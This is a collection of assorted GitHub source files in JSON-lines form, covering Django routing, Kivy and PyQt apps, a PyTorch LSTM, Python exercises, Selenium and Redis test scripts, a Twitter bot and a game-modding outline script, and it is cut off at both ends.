answer\n","repo_name":"beyondthemist/Problem-solving-solution","sub_path":"Programmers/lv.1/12982/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22832568579","text":"from django.urls import path, include\nfrom . import views\n\napp_name = 'mainapp'\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('contact/', views.contact, name='contact'),\n path('products/', views.products, name='products'),\n path('category//', views.ProductsListView.as_view(), name='category'),\n path('product//', views.product, name='product'),\n\n]\n","repo_name":"Shrimp-pixel/furnatureShop","sub_path":"mysite/mainapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5797721342","text":"import os, json\nfrom kivy.properties import (\n\tStringProperty, ColorProperty,\n\tObjectProperty\n)\nfrom kivy.utils import get_color_from_hex\nfrom kivy.app import App\nfrom kivygo.utils import do_correction_path\nfrom kivygo import colors\n\n\nclass kivygoApp(App):\n\n\t# primary_color = ColorProperty(\"\")\n\t# secondary_color = ColorProperty(\"\")\n\t# accent_color = ColorProperty(\"\")\n\t# background_color = ColorProperty(\"\")\n\t# foreground_color = ColorProperty(\"\")\n\t# border_color = ColorProperty(\"\")\n\t# text_color = ColorProperty(\"\")\n\t# heading_color = ColorProperty(\"\")\n\t# subheading_color = ColorProperty(\"\")\n\t# error_color = ColorProperty(\"\")\n\t# success_color = ColorProperty(\"\")\n\t# warning_color = ColorProperty(\"\")\n\t# info_color = ColorProperty(\"\")\n\t# disabled_color = ColorProperty(\"\")\n\t# active_color = ColorProperty(\"\")\n\t# inactive_color = ColorProperty(\"\")\n\t# hover_color = ColorProperty(\"\")\n\t# focus_color = ColorProperty(\"\")\n\t# selected_color = ColorProperty(\"\")\n\t# unselected_color = ColorProperty(\"\")\n\n\tpath_json = StringProperty(\"pallet\")\n\ttheme_json = ObjectProperty(None)\n\n\troot_path = StringProperty(\"\")\n\n\ticon_path = StringProperty(\"assets/icons\")\n\n\timage_path = StringProperty(\"assets/images\")\n\n\tfont_path = StringProperty(\"fonts\")\n\n\n\t_app_file = StringProperty(os.path.split(__file__)[0])\n\n\tdef __init__(self, *args, **kwargs):\n\t\t# Set all colors properties to the App accordian to the `colors.PALLET_KEY_COLORS` \n\t\tfor _key in colors.PALLET_KEY_COLORS:\n\t\t\tcolor = getattr(colors.Light, _key)\n\t\t\tself.apply_property(\n\t\t\t\t**{ _key : ColorProperty(color) }\n\t\t\t)\n\t\t\n\t\tsuper().__init__(*args, **kwargs)\n\n\tdef get_json(self, name, path=None, *args):\n\t\tif path == None:\n\t\t\tpath = self.path_json\n\n\t\twith open(self.get_path(f\"{path}/{name}.json\"), 'r', encoding='utf-8') as file:\n\t\t\treturn json.load(file)\n\n\n\tdef update_json(self, new_json, name, path=None):\n\t\tif path == None:\n\t\t\tpath = self.path_json\n\t\t\n\t\twith open(self.get_path(f\"{path}/{name}.json\"), 'w', encoding='utf-8') as file:\n\t\t\tfile.write(json.dumps(new_json, indent=4))\n\n\tdef on_theme_json(self, *args):\n\t\tif isinstance(self.theme_json, str):\n\t\t\tjson_dict = self.get_json(self.theme_json)\n\t\t\n\t\telif isinstance(self.theme_json, dict):\n\t\t\tjson_dict = self.theme_json\n\t\t\n\t\tpath = do_correction_path(self._app_file)\n\t\tdefault_json = self.get_json(\"default_json_theme\", path)\n\t\t\n\t\tfor key, value in json_dict:\n\t\t\tif key not in default_json:\n\t\t\t\traise TypeError(\"Json theme has an inexistent key!\")\n\t\t\t\n\t\t\tif isinstance(value, str):\n\t\t\t\tsetattr(self, key, get_color_from_hex(value))\n\t\t\telse:\n\t\t\t\tsetattr(self, key, value)\n\n\tdef on_root_path(self, *args):\n\t\tself.root_path = do_correction_path(self.root_path)\n\n\n\tdef get_icon(self, name, ext='png'):\n\t\treturn self.get_path(f'{self.icon_path}/{name}.{ext}')\n\t\n\n\tdef get_image(self, name, ext='png'):\n\t\treturn self.get_path(f'{self.image_path}/{name}.{ext}')\n\n\n\tdef get_font(self, path, name, ext=\"ttf\"):\n\t\treturn self.get_path(f'{self.font_path}/{path}/{name}.{ext}')\n\n\n\tdef get_path(self, local, root_path=None):\n\t\tif root_path == None:\n\t\t\tself.root_path\n\t\t\t\n\t\treturn f'{root_path}/{do_correction_path(local)}'\n\n\tdef change_pallet(self, _obj):\n\t\tif isinstance(_obj, dict):\n\t\t\treturn None\n\t\t\n\t\tfor key in colors.PALLET_KEY_COLORS:\n\t\t\tif hasattr(_obj, key):\n\t\t\t\tsetattr(self, key, getattr(_obj, key))\n","repo_name":"iOsnaaente/Integrador","sub_path":"libs/kivygo/kivygo/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41154473398","text":"from PyQt5 import QtWidgets, QtCore, uic, QtGui, QtPrintSupport\r\nfrom pyqtgraph import PlotWidget, plot\r\nfrom PyQt5.uic import loadUiType\r\nfrom PyQt5.QtWidgets import * \r\nfrom PyQt5.QtCore import *\r\nfrom PyQt5.QtGui import *\r\nfrom os import path\r\nimport pyqtgraph as pg\r\nimport queue as Q\r\nimport pandas as pd\r\nimport numpy as np\r\nimport sys\r\nimport os\r\nfrom PIL import Image\r\nfrom PyQt5.QtGui import QPixmap\r\nimport cv2\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\nclass ImageModel():\r\n def __init__(self, imgPath: str,id):\r\n self.imgPath = imgPath\r\n self.img = cv2.imread(self.imgPath, flags=cv2.IMREAD_GRAYSCALE).T\r\n self.imgShape = self.img.shape\r\n self.fourier = np.fft.fft2(self.img)\r\n self.real = np.real(self.fourier)\r\n self.imaginary = np.imag(self.fourier)\r\n self.magnitude = np.abs(self.fourier)\r\n self.mag_spectrum = np.log10(self.magnitude)\r\n self.phase = np.angle(self.fourier)\r\n self.uniformMagnitude = np.ones(self.img.shape)\r\n self.uniformPhase = np.zeros(self.img.shape)\r\n self.component_list=[self.mag_spectrum,self.phase,self.real,self.imaginary]\r\n\r\n def mix(self, imageToBeMixed, magnitudeOrRealRatio, phaesOrImaginaryRatio , image1_component , image2_component):\r\n weight_img1 = magnitudeOrRealRatio\r\n weight_img2 = phaesOrImaginaryRatio\r\n mixInverse = None\r\n\r\n Magnitude1 = self.magnitude\r\n Magnitude2 = imageToBeMixed.magnitude\r\n\r\n Phase1 = self.phase\r\n Phase2 = imageToBeMixed.phase\r\n\r\n Real1 = self.real\r\n Real2 = imageToBeMixed.real\r\n\r\n Imaginary1 = self.imaginary\r\n Imaginary2 = imageToBeMixed.imaginary\r\n\r\n if image1_component == 'Real' or 'Imaginary' : \r\n\r\n if image1_component == 'Real' : \r\n \r\n realMix = weight_img1*Real1 + (1-weight_img1)*Real2\r\n imaginaryMix = (1-weight_img2)*Imaginary1 + weight_img2*Imaginary2\r\n \r\n else :\r\n realMix = (1-weight_img2)*Real1 + weight_img2*Real2\r\n imaginaryMix = weight_img1*Imaginary1+(1-weight_img1)*Imaginary2\r\n\r\n combined = realMix + imaginaryMix * 1j\r\n\r\n else:\r\n if image1_component == 'Magnitude' : \r\n magnitudeMix = weight_img1*Magnitude1 + (1-weight_img1)*Magnitude2\r\n\r\n elif image1_component == 'Phase' :\r\n phaseMix = weight_img1*Phase1 + (1-weight_img1)*Phase2\r\n\r\n elif image2_component == 'Phase' : \r\n phaseMix = (1-weight_img2)*Phase1 + weight_img2*Phase2\r\n\r\n elif image2_component == 'Magnitude' :\r\n magnitudeMix= (1-weight_img2)*Magnitude1 + weight_img2*Magnitude2\r\n\r\n elif image1_component or image2_component == 'UniMagnitude' :\r\n Magnitude1 = self.uniformMagnitude\r\n magnitudeMix = Magnitude1\r\n\r\n elif image1_component or image2_component == 'UniPhase' :\r\n Phase1 = self.uniformPhase\r\n phaseMix = Phase1 \r\n\r\n combined = np.multiply(magnitudeMix, np.exp(1j * phaseMix))\r\n \r\n mixInverse = np.real(np.fft.ifft2(combined))\r\n\r\n return abs(mixInverse)","repo_name":"Noura-Mahmoud/Mixing_images","sub_path":"ImageModel.py","file_name":"ImageModel.py","file_ext":"py","file_size_in_byte":3274,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"23872436495","text":"from typing import Dict, List\n\nimport torch\nimport torch.nn as nn\nimport numpy as np\n\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n# Перевод символов в индексы (для использования в nn.Embedding)\ncharacters = [' ', \"'\", '0', '1', '2',\n '3', '4', '5', '6', '7',\n '8', '9', 'a', 'b', 'c',\n 'd', 'e', 'f', 'g', 'h',\n 'i', 'j', 'k', 'l', 'm',\n 'n', 'o', 'p', 'q', 'r',\n 's', 't', 'u', 'v', 'w',\n 'x', 'y', 'z']\n\nchar_dict = {v: k + 1 for k, v in enumerate(characters)}\n\n\ndef encode_string(s: str, char_dict=char_dict) -> torch.LongTensor:\n unknown = len(char_dict) + 1\n idxs = torch.LongTensor([char_dict.get(c, unknown) for c in s])\n return idxs\n\n\nclass LSTMNetwork(nn.Module):\n def __init__(self,\n chars: Dict[str, int] = char_dict,\n emb_dim: int = 20,\n hidden_size: int = 100,\n num_layers: int = 1,\n dropout: float = 0.0,\n proj_size: int = 0):\n super(LSTMNetwork, self).__init__()\n self.chars = chars\n self.hidden_size = hidden_size\n self.emb = nn.Embedding(len(self.chars) + 2, emb_dim)\n self.LSTM = nn.LSTM(input_size=emb_dim,\n hidden_size=self.hidden_size,\n num_layers=num_layers,\n bidirectional=True,\n dropout=dropout,\n proj_size=proj_size)\n\n def emb_packed_sequence(self, packed_sequence):\n return torch.nn.utils.rnn.PackedSequence(\n self.emb(packed_sequence.data),\n packed_sequence.batch_sizes\n )\n\n def forward(self, x: List[str]):\n # Кодируем текст в соотве��ствии со словарем символов\n encoded = [encode_string(el) for el in x]\n text_lengths = np.array([len(el) for el in x])\n\n # добавляем паддинг + упаковываем\n padded_encoded = torch.nn.utils.rnn.pad_sequence(encoded).to(device)\n packed_encoded = torch.nn.utils.rnn.pack_padded_sequence(\n padded_encoded, text_lengths)\n\n # пропускаем через слой с эмбеддингами и LSTM\n packed_emb = self.emb_packed_sequence(packed_encoded)\n packed_lstm_output, _ = self.LSTM(packed_emb)\n output, _ = torch.nn.utils.rnn.pad_packed_sequence(packed_lstm_output)\n\n # собираем представление текста с учетом длины исходного текста\n fwd_state = output[text_lengths - 1,\n range(len(text_lengths)),\n :self.hidden_size]\n rev_state = output[0, :, :self.hidden_size]\n output = torch.cat((fwd_state, rev_state), 1)\n\n return output\n","repo_name":"PetrovitchSharp/DL_CNM_23","sub_path":"src/models/lstm.py","file_name":"lstm.py","file_ext":"py","file_size_in_byte":2966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12880684928","text":"import logging\n\nimport uvicorn\n\nfrom my_web_framework.api import SomeAPI\nfrom my_web_framework.controller import BaseController, get\n\nlogger = logging.getLogger()\n\n\nclass NameController(BaseController):\n @get(\"/names/{name}\")\n async def get(self, name: str):\n logger.info(\"Hello world\")\n return f\"Hello {name}!\"\n\n\napi = SomeAPI(title=\"Some API\", version=\"2023\")\napi.mount(NameController())\n\nif __name__ == \"__main__\":\n uvicorn.run(api, port=5000, log_level=\"debug\")\n","repo_name":"inikolaev/my-web-framework","sub_path":"my_web_framework/examples/01-simple.py","file_name":"01-simple.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"5247756033","text":"courses = ['History', 'chemistry', 'compSci', 'Geography', 'math']\n\n# Slice method in python\nprint(courses[0:4])\n\n\n# Append Method\ncourses.append('Economics')\n\nhigherCourses = ['DeepLearning', 'Machine Learning', 'Neural Network', 'CNN', 'RNN']\n\ncourses.extend(higherCourses)\n\ncourses.remove('CNN')\n\ncourses.append('Scikit Learn')\n\n\ncourses.insert(0, 'Reinforcement Learning')\n\ncourses.pop()\n\ndeletedCourse = courses.pop()\n\nprint(deletedCourse)\n\ncourses.sort()\nprint(courses)\n\n\n\n\n\n","repo_name":"sheddy20/My-python-projects","sub_path":"List.py","file_name":"List.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4640932388","text":"#Setler indekslenemez ve sıralanamaz\nmeyveler={\"elma\",\"kiraz\",\"kavun\",\"üzüm\"}\nsebzeler={\"bezelye\",\"soğan\"}\n\nsonuc= \"elma\" in meyveler\n\nmeyveler.add(\"karpuz\")\n\nmeyveler.update([\"vişne\",\"muz\",\"kavun\"])\n\nmeyveler.remove(\"karpuz\")\n\nmeyveler.pop()#her çalıştırmada farklı meyve silinir\n\n#meyveler.clear()\n\nsonuc=meyveler.union(sebzeler)\nsonuc=meyveler\n\n\n\n#print(sonuc)\n\n","repo_name":"yekham/PythonTutorial_tr","sub_path":"VeriYapıları/sets.py","file_name":"sets.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25668457948","text":"from chinese_text_splitter import ChineseTextSplitter\nfrom langchain.document_loaders import UnstructuredFileLoader, TextLoader, CSVLoader\n\nfrom zh_title_enhance import zh_title_enhance\nfrom pdf_loader import UnstructuredPaddlePDFLoader\nimport os\n\n\ndef load_file(filepath, sentence_size=100, using_zh_title_enhance=True):\n\n if filepath.lower().endswith(\".md\"):\n loader = UnstructuredFileLoader(filepath, mode=\"elements\")\n docs = loader.load()\n elif filepath.lower().endswith(\".txt\"):\n loader = TextLoader(filepath, autodetect_encoding=True)\n textsplitter = ChineseTextSplitter(pdf=False, sentence_size=sentence_size)\n docs = loader.load_and_split(textsplitter)\n elif filepath.lower().endswith(\".pdf\"):\n # 暂且将paddle相关的loader改为动态加载,可以在不上传pdf/image知识文件的前提下使用protobuf=4.x\n loader = UnstructuredPaddlePDFLoader(filepath)\n textsplitter = ChineseTextSplitter(pdf=True, sentence_size=sentence_size)\n docs = loader.load_and_split(textsplitter)\n else:\n loader = UnstructuredFileLoader(filepath, mode=\"elements\")\n textsplitter = ChineseTextSplitter(pdf=False, sentence_size=sentence_size)\n docs = loader.load_and_split(text_splitter=textsplitter)\n if using_zh_title_enhance:\n docs = zh_title_enhance(docs)\n write_check_file(filepath, docs)\n return docs\n\ndef write_check_file(filepath, docs):\n folder_path = os.path.join(os.path.dirname(filepath), \"tmp_files\")\n if not os.path.exists(folder_path):\n os.makedirs(folder_path)\n fp = os.path.join(folder_path, 'load_file.txt')\n with open(fp, 'a+', encoding='utf-8') as fout:\n fout.write(\"filepath=%s,len=%s\" % (filepath, len(docs)))\n fout.write('\\n')\n for i in docs:\n fout.write(str(i))\n fout.write('\\n')\n fout.close()\n\nload_file(\"/Users/zhucanxiang/Desktop/psy_resources/icd-11.pdf\", 100, True)","repo_name":"zhucanxiang/psyTools","sub_path":"loader/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20720652175","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport redis\nimport struct\nimport json\nimport sys\n\nsys.path.append(\"./\")\n\ndef invite(lua_script):\n keys = []\n args = [100, 101, 'mnick', 'micon', 200, 201, 'snick', 'sicon', 123456]\n\n reply = []\n reply = lua_script(keys, args)\n\n print(\"invite res:%s\" % reply)\n\ndef cancel(lua_script):\n keys = []\n args = [100, 200]\n\n reply = []\n reply = lua_script(keys, args)\n\n print(\"cancel res:%s\" % reply)\n\ncall_function = {'invite' : invite, 'cancel' : cancel}\n\nredis_config = {'host': '1.1.1.1',\n 'port': 6000,\n 'password': ''\n}\n\nOPT = ['invite', 'cancel']\n\ndef check_param(argv):\n argc = len(argv)\n if argc < 2:\n return False\n \n if argv[1] not in OPT:\n return False\n return True\n \ndef main():\n if not check_param(sys.argv):\n print(\"invalid args \\n\")\n return None\n\n cmd = sys.argv[1]\n print(\"cmd : %s\\n\" % cmd)\n \n r = redis.Redis(redis_config['host'], redis_config['port'], 0, redis_config['password'])\n\n if cmd == 'clear':\n r.delete('#testkey')\n print(\"%s succ\\n\" % cmd)\n return None\n \n # 载入lua脚本\n lua_file = cmd + '.lua'\n with open(lua_file, 'rb') as f:\n test_lua = f.read()\n lua_script = r.register_script(test_lua)\n\n call_function[cmd](lua_script)\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"logosky/python","sub_path":"tools/test_lua.py","file_name":"test_lua.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16562038701","text":"#Exercise 6.6\n'''Write a function that receives two parameters: the diameter of a round pizza in centimeters and\n the price of the pizza in euros. The function calculates and returns the unit price of the pizza per square meter.\n The main program asks the user to enter the diameter and price of two pizzas and tells the user which pizza provides\n better value for money (which of them has a lower unit price).\n You must use the function you wrote for calculating the unit prices.'''\nimport math\n\ndef price_per_meter(diameter, price):\n area = round((diameter* math.pi),4)\n unit_price = price/area\n print (\"The price of this pizza per square meter is: \" ,round(unit_price,4), \"euro\\n\")\n return unit_price\n\n\nfirst_pizza_diameter = int(input(\"Enter the diameter of the first pizza: \"))\nfirst_pizza_price = int(input(\"Enter the price of the first pizza: \"))\nfirst_pizza_value = price_per_meter(first_pizza_diameter,first_pizza_price)\n\nsecond_pizza_diameter = int(input(\"Enter the diameter of the first pizza: \"))\nsecond_pizza_price = int(input(\"Enter the price of the first pizza: \"))\nsecond_pizza_value = price_per_meter(second_pizza_diameter,second_pizza_price)\n\nif (first_pizza_valuesecond_pizza_value):\n print(\"The second pizza is cheaper than the first pizza.\")\nelif(first_pizza_value==second_pizza_value):\n print(\"The price is the same\")","repo_name":"AnnaLinden/Metropolia_Python_Assignments","sub_path":"ExerciseSet6/Exercise 6.6.py","file_name":"Exercise 6.6.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28619347777","text":"#\n# @lc app=leetcode id=216 lang=python3\n#\n# [216] Combination Sum III\n#\n\n# @lc code=start\nclass Solution:\n def combinationSum3(self, k: int, n: int) -> List[List[int]]:\n res = []\n def dfs(target, start, path):\n len_path = len(path)\n if target < 0 or len_path > k: return\n if len_path == k and target == 0:\n res.append(path)\n return\n for i in range(start, 10):\n dfs(target - i, i + 1, path + [i])\n dfs(n, 1, [])\n return res\n\n\n \n# @lc code=end\n\n","repo_name":"Anderbone/leetcode","sub_path":"Python/216.combination-sum-iii.py","file_name":"216.combination-sum-iii.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73841000231","text":"import simple_draw as sd\r\n\r\n#\r\n# colors = {\r\n# \"white\": sd.COLOR_WHITE,\r\n# \"black\": sd.COLOR_BLACK,\r\n# \"red\": sd.COLOR_RED,\r\n# \"orange\": sd.COLOR_ORANGE,\r\n# \"yellow\": sd.COLOR_YELLOW,\r\n# \"green\": sd.COLOR_GREEN,\r\n# \"cyan\": sd.COLOR_CYAN,\r\n# \"blue\": sd.COLOR_BLUE,\r\n# \"purple\": sd.COLOR_PURPLE,\r\n# \"dark orange\": sd.COLOR_DARK_ORANGE\r\n# }\r\n\r\n_colors = (sd.COLOR_RED, sd.COLOR_ORANGE, sd.COLOR_YELLOW, sd.COLOR_GREEN,\r\n sd.COLOR_CYAN, sd.COLOR_BLUE, sd.COLOR_PURPLE)\r\n\r\nblink_index = 0\r\n\r\n\r\ndef smile(center_point, color, width):\r\n # голова\r\n radius = 50\r\n sd.circle(center_position=center_point, radius=radius, color=color, width=width)\r\n\r\n # глаз левый\r\n point = sd.get_point(x=center_point.x - 20, y=center_point.y + 10)\r\n radius = 5\r\n sd.circle(center_position=point, radius=radius, color=color, width=width)\r\n\r\n # глаз правый\r\n point = sd.get_point(x=center_point.x + 20, y=center_point.y + 10)\r\n radius = 5\r\n sd.circle(center_position=point, radius=radius, color=color, width=width)\r\n\r\n # улыбка\r\n point_1 = sd.get_point(x=center_point.x - 25, y=center_point.y - 15)\r\n point_2 = sd.get_point(x=center_point.x - 15, y=center_point.y - 20)\r\n point_3 = sd.get_point(x=center_point.x + 15, y=center_point.y - 20)\r\n point_4 = sd.get_point(x=center_point.x + 30, y=center_point.y - 15)\r\n point_list = point_1, point_2, point_3, point_4\r\n sd.lines(point_list=point_list, color=color, closed=False, width=width)\r\n\r\n\r\ndef smile_blinks(center_point):\r\n global blink_index\r\n # smile(center_point=center_point, color=color, width=5)\r\n smile(center_point=center_point, color=_colors[blink_index], width=5)\r\n blink_index += 1\r\n if blink_index == len(_colors):\r\n blink_index = 0\r\n","repo_name":"esurkova90/practicing","sub_path":"village/smile.py","file_name":"smile.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71128574313","text":"import os\n\nimport pandas as pd\n\nfrom joblib import load\nfrom datetime import datetime\nfrom data_api import find_additional_info\n\n\ndef get_input():\n while True:\n lat, long = input(\"Enter coordinates (e.g: 33.205317, -97.153130): \").split(',')\n lat, long = float(lat), float(long)\n if isinstance(lat, (float, int)) and isinstance(long, (float, int)):\n break\n else:\n print(\"Invalid coordinate pair, please reenter.\")\n\n day = None\n\n check = input(\"Would you like to use the current time? (y/n): \")\n if check.lower() == 'n':\n while True:\n day = input(\"Please enter date (DD/MM/YYYY): \")\n try:\n day = datetime.strptime(day, '%d/%m/%Y')\n break\n except ValueError:\n print(\"Invalid input, please try again.\")\n return lat, long, day\n\n\ndef input_process():\n input_data = get_input()\n data_dict = find_additional_info(*input_data)\n df = pd.DataFrame(data_dict, index=[0])\n\n features = [\"Hour\", \"Weekend\", \"Month\", \"radius_in_miles\", \"population\",\n \"population_density\", \"land_area_in_sqmi\", \"water_area_in_sqmi\",\n \"housing_units\", \"occupied_housing_units\", \"median_home_value\",\n \"median_household_income\", \"temp\", \"dwpt\", \"rhum\", \"prcp\",\n \"wdir\", \"wspd\", \"pres\", \"coco\"]\n return df[features]\n\n\ndef load_models():\n models = {}\n for root, dirs, files in os.walk(\"../notebooks/model_cache\", topdown=False):\n for name in files:\n model_path = os.path.join(root, name)\n print(f\"Loading: {model_path}\")\n models[name.split('.')[0]] = load(model_path)\n print(\"Done.\")\n return models\n\n\ndef make_inference(model, input_data):\n percentiles = ['P20', 'P40', 'P50', 'P60', 'P80']\n print('\\n############################')\n print(f'Predicting with {str(model[\"regr\"])}:')\n print('Wait expected')\n preds = model[\"model\"].predict(input_data)[0]\n for i in range(len(preds)):\n print(f'\\t{percentiles[i]}: {round(preds[i])} s.')\n print('############################\\n')\n\n\ndef main():\n input_data = input_process()\n model_dict = load_models()\n for model in model_dict:\n make_inference(model_dict[model], input_data)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"caseyeaster39/5215project","sub_path":"scripts/wait_time.py","file_name":"wait_time.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8506244500","text":"import tensorflow as tf\n\nimport numpy as np\nimport pandas as pd\n\nfrom model import create_model\n\nif __name__ == \"__main__\":\n # --------------------------------------------------------------------------\n # preliminaries\n myDtype = 'float32'\n\n a0 = 0.005 # initial crack length [m]\n m = 3.8 # Paris model exponent\n C = 1.5E-11 # Paris model constant\n\n # --------------------------------------------------------------------------\n # fleet information\n df = pd.read_csv('aFleet_5yrs.csv', index_col=None, dtype=myDtype)\n aFleet = np.asarray(df)\n\n df = pd.read_csv('SFleet_5yrs.csv', index_col=None, dtype=myDtype)\n SFleet = np.transpose(np.asarray(df))\n nFleet, nCycles = SFleet.shape\n\n # --------------------------------------------------------------------------\n idx = np.argsort(aFleet[-1, :])\n\n arange = np.asarray(np.linspace(0, 299, 60), dtype=int)\n idxTrain = idx[arange]\n\n Sobs = SFleet[idxTrain, :]\n Sobs = Sobs[:, :, np.newaxis]\n\n batch_input_shape = Sobs.shape\n\n SFleet = SFleet[:, :, np.newaxis]\n\n nObs = Sobs.shape[0]\n\n # --------------------------------------------------------------------------\n aTarget = aFleet[-1, idxTrain]\n aTarget = aTarget[:, np.newaxis]\n\n a0RNN = a0 * np.ones((nObs, 1), dtype=myDtype)\n\n # --------------------------------------------------------------------------\n dkLayer = tf.keras.models.load_model('DK_MLP.h5')\n dkLayer.trainable = True\n\n model = create_model(dkLayer=dkLayer, C=C, m=m,\n batch_input_shape=batch_input_shape, a0RNN=a0RNN, myDtype=myDtype)\n\n # --------------------------------------------------------------------------\n EPOCHS = 5\n jmdDir = \"./training_%d_points\" % len(idxTrain)\n\n weight_path = jmdDir + \"/cp.ckpt\"\n ModelCheckpoint = tf.keras.callbacks.ModelCheckpoint(filepath=weight_path, monitor='loss',\n verbose=1, save_best_only=True,\n mode='min', save_weights_only=True)\n\n callbacks_list = [ModelCheckpoint]\n\n history = model.fit(Sobs, aTarget, epochs=EPOCHS, steps_per_epoch=1, verbose=1, callbacks=callbacks_list)\n\n # --------------------------------------------------------------------------\n df = pd.DataFrame.from_dict(history.history)\n df.insert(loc=0, column='epoch', value=history.epoch)\n df.to_csv(jmdDir + \"/lossHistory.csv\", index=False)\n","repo_name":"PML-UCF/pinn","sub_path":"samples/cumulative_damage/airplane_fleet_crack_growth/run01_train_cumulative_damage.py","file_name":"run01_train_cumulative_damage.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","stars":183,"dataset":"github-code","pt":"72"} +{"seq_id":"39900196159","text":"import pytest\nfrom pages.demoqa_check_box_page import DemoqaCheckBoxPage\nimport time\n\n@pytest.mark.usefixtures(\"tc_setup\")\nclass TestCheckBoxCase02:\n def test_check_box_tc_02(self):\n # 01. Launch the demoqa website\n ch_bx_page = DemoqaCheckBoxPage(self.driver)\n ch_bx_page.page_scroll()\n ch_bx_page.navigate_to_checkbox_page()\n\n # 02.Click on Expand all button\n ch_bx_page.click_on_expand_all()\n time.sleep(2)\n # 03.Select the Home checkbox\n ch_bx_page.select_home_checkbox()\n time.sleep(2)\n\n # Verify that the home checkbox is selected\n ch_bx_page.verify_checkbox_is_selected(DemoqaCheckBoxPage.HOME_CHECKED)\n","repo_name":"MoJoe13/selenium-py-framework","sub_path":"testcases/test_demoqa_02_checkbox_expand_all_and_select_all.py","file_name":"test_demoqa_02_checkbox_expand_all_and_select_all.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30267623757","text":"if __name__ == '__main__':\n import time\n import database\n import twitter\n\n twitter.tweet_start()\n\n restricted_users = database.get_restricted_users()\n\n if (len(restricted_users) > 0):\n previous_status = twitter.tweet_restricted_start(len(restricted_users))\n for user in restricted_users:\n previous_status = twitter.tweet_restricted(user, previous_status)\n \n user_ids = database.get_users_that_removed()\n tweet_total = tweet_count = 0\n\n for user_id in user_ids:\n user = database.get_user(user_id)\n previous_status = twitter.tweet_start_user(user)\n tweets = database.get_tweets(user_id)\n for tweet in tweets:\n previous_status = twitter.tweet_erased(tweet, previous_status)\n database.update_tweet(tweet)\n tweet_total += 1\n tweet_count += 1\n twitter.tweet_end_user(user, len(tweets), previous_status)\n\n if tweet_count >= 25:\n tweet_count = 0\n time.sleep(3600)\n\n twitter.tweet_end(tweet_total)","repo_name":"projeto7c0/7c0","sub_path":"tweet.py","file_name":"tweet.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"74108402471","text":"# Author: SilentNightSound#7430\n# Allows user to set thickness of outlines on model\n# Slightly more powerful than the remove outline script\n\n# Place in Mod folder and run with python genshin_set_outlines.py --thickness t\n# where t is a value between 0 (no outline) and 255 (thick as possible)\n\nimport os\nimport argparse\nimport struct\nimport shutil\nimport json\nimport math\n\ndef main():\n \n parser = argparse.ArgumentParser(description=\"Set outline thickness\")\n parser.add_argument(\"--thickness\", type=int, default=0, help=\"Thickness of outline (0 - no outline, 255 - maximum outline)\")\n args = parser.parse_args()\n\n texcoord_file = [x for x in os.listdir(\".\") if \"Texcoord.buf\" in x]\n if len(texcoord_file) == 0:\n print(f\"ERROR: unable to find texcoord file. Ensure you are running this in the same folder as CharTexcoord.buf. Exiting\")\n return\n if len(texcoord_file) > 1:\n print(f\"ERROR: more than one texcoord file identified {texcoord_file}. Please remove files until only one remains, then run script again. Exiting\")\n texcoord_file = texcoord_file[0]\n\n ini_file = [x for x in os.listdir(\".\") if \".ini\" in x]\n if len(ini_file) == 0:\n print(f\"ERROR: unable to find .ini file. Ensure you are running this in the same folder as Char.ini. Exiting\")\n return\n if len(ini_file) > 1:\n print(f\"ERROR: more than one .ini file identified {ini_file}. Please remove files until only one remains, then run script again. Exiting\")\n ini_file = ini_file[0]\n\n with open(ini_file, \"r\") as f:\n stride = int(f.read().split(texcoord_file)[0].split(\"\\n\")[-2].split(\"=\")[1].strip())\n\n print(f\"Texcoord: {texcoord_file}, Ini: {ini_file}, Stride: {stride}\")\n\n with open(texcoord_file, \"rb+\") as f:\n print(\"Removing outlines\")\n data = bytearray(f.read())\n i = 0\n while i < len(data):\n data[i+3] = args.thickness\n i += stride\n\n print(\"Writing results to new file\")\n f.seek(0)\n 